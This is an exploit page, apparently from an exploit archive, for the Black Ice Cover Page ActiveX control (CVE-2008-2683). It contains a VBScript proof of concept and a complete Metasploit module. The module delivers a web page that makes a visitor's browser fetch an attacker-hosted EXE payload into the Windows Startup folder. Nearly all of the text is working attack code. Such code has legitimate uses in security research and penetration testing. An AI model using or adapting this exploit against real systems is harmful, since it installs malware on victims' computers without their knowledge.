|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144  |  <html> Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit <!-- RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False vendor: http://www.blackice.com/ software link: http://www.blackice.com/DownloadForms/downloadformimp.asp?product=Cover+Page+Generator --> <object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='target' ></object> <script language='vbscript'> arg1="http://www.google.com/robots.txt" arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt" target.DownloadImageFileURL arg1 ,arg2  </script> </html> # MSF Module ## # $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpServer::HTML  include Msf::Exploit::EXE  include Msf::Exploit::Remote::BrowserAutopwn  autopwn_info({  :os_name=> OperatingSystems::WINDOWS,  :javascript => true,  :rank => NormalRanking,  :vuln_test=> nil,  })  def initialize(info = {})  super(update_info(info,  'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download',  'Description'=> %q{  This module allows remote attackers to place arbitrary files on a users file system  by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0).  This issue is also reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.  },  'License'=> MSF_LICENSE,  'Author' => [   'shinnai', # original discovery  'mr_me' # msf  ],  'Version'=> '$Revision: 12540 $',  'References' =>  [  [ 'CVE', '2008-2683'],  [ 'OSVDB', '46007'],  [ 'BID', '29577'],  [ 'URL', 'http://www.exploit-db.com/exploits/5750/' ],  ],  'DefaultOptions' =>  {  'InitialAutoRunScript' => 'migrate -f',  },  'Payload'=>  {  'Space' => 2048,  'StackAdjustment' => -3500,  },  'Platform' => 'win',  'Targets'=>  [  [ 'Automatic', { } ],  ],  'DefaultTarget'=> 0,  'DisclosureDate' => 'Jun 20 2011'))  register_options(  [  OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\']),  ], self.class)  end  def autofilter  false  end  def check_dependencies  use_zlib  end  def on_request_uri(cli, request)  payload_url ="http://"  payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']  payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"  if (request.uri.match(/payload/))  return if ((p = regenerate_payload(cli)) == nil)  data = generate_payload_exe({ :code => p.encoded })  print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")  send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })  return  end  # random junk  vname= rand_text_alpha(rand(100) + 1)  exe= rand_text_alpha(rand(20) + 1)  clsid= "79956462-F148-497F-B247-DF35A095F80B"  blackice = rand_text_alpha(rand(100) + 1)  method = "DownloadImageFileURL"  arg1 = rand_text_alpha(rand(100) + 1)  arg2 = rand_text_alpha(rand(100) + 1)  content = <<-EOS  <html>  <object classid='clsid:#{clsid}' id='#{blackice}' ></object>  <script language='vbscript'>  #{arg1} = "#{payload_url}"  #{arg2} = "#{datastore['PATH']}#{exe}.exe"  #{blackice}.#{method} #{arg1}, #{arg2}  </script>  </html>  EOS  print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")  send_response_html(cli, content)  handler(cli)  end end  |